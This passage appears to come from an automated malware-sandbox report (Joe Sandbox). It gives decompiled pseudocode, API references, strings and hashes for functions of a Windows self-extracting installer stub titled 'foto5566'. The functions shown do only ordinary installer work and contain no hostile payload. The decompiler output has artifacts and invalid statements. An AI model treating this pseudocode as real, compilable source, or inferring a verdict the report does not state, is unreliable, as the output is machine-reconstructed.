WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0093252C
_lopen.KERNEL32 ref: 0093253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 0093254C
_lclose.KERNEL32(00000000), ref: 00932555

Strings

wininit.ini, xrefs: 00932510

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: 8c05cb22ed84bf41fa4f91ac2fdaa3caec08a6712327b36dad662d0f3749e85d
Instruction ID: 11e21c8ac9fbf1aec85f747666f236dbfe15dde6b4137f7603d70d94de1b56a5
Opcode Fuzzy Hash: 8c05cb22ed84bf41fa4f91ac2fdaa3caec08a6712327b36dad662d0f3749e85d
Instruction Fuzzy Hash: 8001D4326041186BC7209B65DC0CEDFBBBCEB86760F000165FA89D31A0DF748E45CEA1

Uniqueness

Uniqueness Score: -1.00%

Function 009336EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E009336EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x938004; // 0x911e09f9
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x938184 = 1;
						 *0x938180 = 1;
						L13:
						 *0x939a40 = _t119;
						L14:
						__eflags =  *0x938a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00932A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00932A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x938a38 & 0x00000001;
											if(( *0x938a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("foto5566");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0093681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "foto5566", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E009367C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E009328E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x939a40 = _t119;
						 *0x938184 = 1;
						 *0x938180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x939a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x938184 = _t135;
							 *0x938180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E009344B9(0, _t138);
					L66:
					return E00936CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x009336f9
0x00933700
0x0093370c
0x00933716
0x00933718
0x0093371b
0x00933721
0x0093372b
0x0093373d
0x00933745
0x00933746
0x00933746
0x00933749
0x009337ab
0x009337ad
0x009337ae
0x009337b3
0x009337b8
0x009337b8
0x009337bf
0x009337bf
0x009337c5
0x00000000
0x00000000
0x009337cb
0x009337cd
0x00000000
0x00000000
0x009337d5
0x009337db
0x009337e8
0x009337ea
0x009337ea
0x009337ea
0x009337f0
0x009337f6
0x00933805
0x00933817
0x0093382b
0x00933830
0x00933836
0x0093383b
0x0093383d
0x009338eb
0x009338eb
0x009338f2
0x0093390c
0x00933911
0x00933911
0x00933913
0x0093394d
0x0093394d
0x0093394f
0x009338a9
0x009338a9
0x009338b0
0x009338b2
0x009338b9
0x009338bb
0x009338c1
0x00933975
0x009338c7
0x009338de
0x009338e0
0x009338e0
0x0093397b
0x0093397d
0x009339a9
0x0093397f
0x00933982
0x0093398b
0x0093398d
0x0093398f
0x0093399f
0x009339a1
0x00933991
0x00933991
0x00933991
0x0093398f
0x009339af
0x009339b6
0x00933a0f
0x00933a0f
0x00933a11
0x00933a13
0x00933a19
0x00000000
0x009339b8
0x009339b8
0x009339ba
0x00000000
0x00000000
0x009339bc
0x009339bf
0x00000000
0x00000000
0x009339c3
0x009339c9
0x009339ce
0x009339d0
0x009339e3
0x009339e5
0x009339e6
0x009339f1
0x009339f7
0x009339fa
0x00933a01
0x00933a04
0x00000000
0x00000000
0x00933a06
0x00933a09
0x00933a09
0x00933a0b
0x00933a0b
0x00000000
0x00933a09
0x009339fc
0x00000000
0x009339fc
0x009339d3
0x009339d8
0x009339da
0x00000000
0x00000000
0x00000000
0x009339dc
0x009339b6
0x00933955
0x0093395b
0x00000000
0x00000000
0x00933961
0x00933963
0x00000000
0x00000000
0x00933969
0x00933969
0x00000000
0x00933969
0x00933915
0x00933915
0x0093391b
0x0093391f
0x00000000
0x00000000
0x0093392d
0x00933933
0x00933938
0x0093393a
0x00000000
0x00000000
0x00933940
0x00933946
0x0093394b
0x00000000
0x0093394b
0x00000000
0x009338f2
0x00933843
0x00933845
0x00000000
0x00000000
0x0093384b
0x0093384d
0x00933883
0x00933885
0x00000000
0x00000000
0x0093389a
0x0093389e
0x0093389e
0x00000000
0x00000000
0x009338a0
0x009338a0
0x009338a2
0x00000000
0x00000000
0x009338a4
0x00000000
0x009338a4
0x0093384f
0x00933851
0x00933857
0x0093386e
0x00933877
0x0093387b
0x00000000
0x00000000
0x00000000
0x00933881
0x00933859
0x0093385c
0x00933862
0x00933866
0x00000000
0x00000000
0x00933868
0x00000000
0x009338f4
0x009338f4
0x009338f5
0x009338fb
0x00933901
0x00933901
0x00000000
0x0093390a
0x0093374b
0x0093374e
0x0093375c
0x00933764
0x00933769
0x0093376e
0x00933771
0x0093379c
0x0093379f
0x00000000
0x00000000
0x009337a3
0x009337a4
0x00000000
0x009337a4
0x00933773
0x00933777
0x00933778
0x0093377f
0x00933781
0x0093378e
0x0093378e
0x00933794
0x00000000
0x00933794
0x00933783
0x00000000
0x00000000
0x00933785
0x0093378c
0x00000000
0x00000000
0x00000000
0x0093378c
0x00933750
0x00000000
0x0093372d
0x0093372d
0x0093396b
0x0093396b
0x0093396c
0x0093396e
0x0093396f
0x00933a1e
0x00933a1e
0x00933a22
0x00933a27
0x00933a3e
0x00933a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00933723
MessageBeep.USER32(00000000), ref: 009339C3
MessageBoxA.USER32(00000000,00000000,foto5566,00000030), ref: 009339F1

Strings

3, xrefs: 00933785
foto5566, xrefs: 009339E9, 00933A19

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$foto5566
API String ID: 2519184315-4228617117
Opcode ID: 3c684fbf16ced028953b5c2b8aaaa04609992a4b4df6d9ac2ec39d2dcc630123
Instruction ID: c193a4093acb4806dece6108f4db0a27456a5d249504aad2547c3c4044581ef9
Opcode Fuzzy Hash: 3c684fbf16ced028953b5c2b8aaaa04609992a4b4df6d9ac2ec39d2dcc630123
Instruction Fuzzy Hash: F2912371E95224DBDB348F15CD80BAA77B4EB85300F1581A9E88ADB251DB748F81DF01

Uniqueness

Uniqueness Score: -1.00%

Function 00936495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00936495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x938004; // 0x911e09f9
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00931781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
				_t26 = "advpack.dll";
				E0093658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00936CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x00936495
0x00936495
0x009364a0
0x009364a7
0x009364ab
0x009364bd
0x009364c2
0x009364d3
0x009364df
0x009364e8
0x00936502
0x009364ee
0x009364f9
0x009364f9
0x00936516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 009364DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 009364F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00936502

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 009364AC
advpack.dll, xrefs: 009364C2, 009364CD, 00936501

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
API String ID: 438848745-2381869747
Opcode ID: 4795324de2cd5b924a281df1eb2ce74e82d044b97bd3e97088d9edb190634054
Instruction ID: b05812eaa0299af2212c2914679dee9bf304c68523b60ff59ea2786af5e80739
Opcode Fuzzy Hash: 4795324de2cd5b924a281df1eb2ce74e82d044b97bd3e97088d9edb190634054
Instruction Fuzzy Hash: 0501F470A18108ABDB24DBA4DC49FEE7778EB91310F5001A5F5C5921D0DFB09E8ADF51

Uniqueness

Uniqueness Score: -1.00%

Function 009328E8 Relevance: 7.6, APIs: 5, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E009328E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00932773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00932A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00932A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x009328f1
0x009328f4
0x009328f7
0x009328f9
0x009328fc
0x009328ff
0x00932901
0x00932907
0x00932a62
0x00932a64
0x0093290d
0x0093290d
0x0093290f
0x00932912
0x00932920
0x00932937
0x00000000
0x00000000
0x00932944
0x0093294a
0x0093294f
0x00932a2f
0x00932a32
0x00932a34
0x00932a37
0x00932a41
0x00000000
0x00000000
0x00932955
0x0093295e
0x00932962
0x00932969
0x0093296f
0x00932974
0x0093298c
0x00932a20
0x00932a21
0x00932a27
0x00932a4c
0x00932a4f
0x00932a50
0x00932a53
0x00932a56
0x00932a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x009329b2
0x009329b2
0x009329b5
0x009329bd
0x009329c3
0x009329cc
0x009329d5
0x009329d7
0x009329da
0x009329dd
0x009329df
0x009329ec
0x009329f8
0x009329fc
0x009329ff
0x00932a02
0x00932a07
0x00932a0a
0x00932a0f
0x00932a19
0x00932a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00932a0f
0x0093298c
0x00932974
0x00932962
0x00000000
0x0093294f
0x00932912
0x00932a65
0x00932a68
0x00932a6c
0x00932a6f
0x00932a6f
0x00932a7d

APIs

GlobalFree.KERNEL32 ref: 00932A6F

Part of subcall function 00932773: CharUpperA.USER32(911E09F9,00000000,00000000,00000000), ref: 009327A8
Part of subcall function 00932773: CharNextA.USER32(0000054D), ref: 009327B5
Part of subcall function 00932773: CharNextA.USER32(00000000), ref: 009327BC
Part of subcall function 00932773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00932829
Part of subcall function 00932773: RegQueryValueExA.ADVAPI32(?,00931140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00932852
Part of subcall function 00932773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00932870
Part of subcall function 00932773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 009328A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00933938,?,?,?,?,-00000005), ref: 00932958
GlobalLock.KERNEL32 ref: 00932969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00933938,?,?,?,?,-00000005,?), ref: 00932A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00932A81

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID:
API String ID: 3949799724-0
Opcode ID: bc889c295c600d6ea2322c51a7e5785e95b318503c2a78733c2bebde86438c37
Instruction ID: 992513a17adaf824ffef2e04a44187c1335cc03046e3b1117bd958dee8a7b673
Opcode Fuzzy Hash: bc889c295c600d6ea2322c51a7e5785e95b318503c2a78733c2bebde86438c37
Instruction Fuzzy Hash: 32512631E00219EBCB25CF98C984AAEBBB9FF48700F14402AE955E3251DB319E41DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00934169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00934169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E0093468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E0093468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E009344B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E009344B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x0093417d
0x0093418f
0x00934193
0x009341b7
0x009341d3
0x009341e6
0x00000000
0x009341e7
0x009341d5
0x009341d6
0x009341d8
0x009341d9
0x009341da
0x009341df
0x009341e1
0x00000000
0x009341e1
0x009341b9
0x009341ba
0x009341bc
0x009341bd
0x009341be
0x00000000
0x009341be
0x00000000

APIs

Part of subcall function 0093468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009346A0
Part of subcall function 0093468F: SizeofResource.KERNEL32(00000000,00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346A9
Part of subcall function 0093468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009346C3
Part of subcall function 0093468F: LoadResource.KERNEL32(00000000,00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346CC
Part of subcall function 0093468F: LockResource.KERNEL32(00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346D3
Part of subcall function 0093468F: memcpy_s.MSVCRT ref: 009346E5
Part of subcall function 0093468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009346EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,009330B4), ref: 00934189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,009330B4), ref: 009341E7

Part of subcall function 009344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00934518
Part of subcall function 009344B9: MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00934554

Strings

FINISHMSG, xrefs: 00934173, 009341AB
<None>, xrefs: 009341C5

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: f0039e18f124b15fafc9bba6b2a1687c0bc0471be822d048d8c7b255ea2d075f
Instruction ID: 442f5f5294adf0b4789aafb6f78146fddbdcff906c436e31056aeb8a1d6c4760
Opcode Fuzzy Hash: f0039e18f124b15fafc9bba6b2a1687c0bc0471be822d048d8c7b255ea2d075f
Instruction Fuzzy Hash: 1F01F4B53086143BF3241AA54C86F7B61CEDBE5799F024035B746E11A0DAA8EC414D76

Uniqueness

Uniqueness Score: -1.00%

Function 009319E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E009319E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x938004; // 0x911e09f9
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E009343D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x939a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00936CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x009319e0
0x009319e0
0x009319eb
0x009319f2
0x009319f9
0x009319fc
0x00931a01
0x00931a2a
0x00931a2e
0x00931a3e
0x00931a4f
0x00931a62
0x00931a6a
0x00000000
0x00931a03
0x00931a06
0x00931a20
0x00931a20
0x00931a08
0x00931a08
0x00931a14
0x00000000
0x00931a16
0x00931a18
0x00931a70
0x00931a72
0x00931a72
0x00931a14
0x00931a06
0x00931a81

APIs

EndDialog.USER32(?,?), ref: 00931A18
GetDesktopWindow.USER32 ref: 00931A24
LoadStringA.USER32(?,?,00000200), ref: 00931A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00931A62
MessageBeep.USER32(000000FF), ref: 00931A6A

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
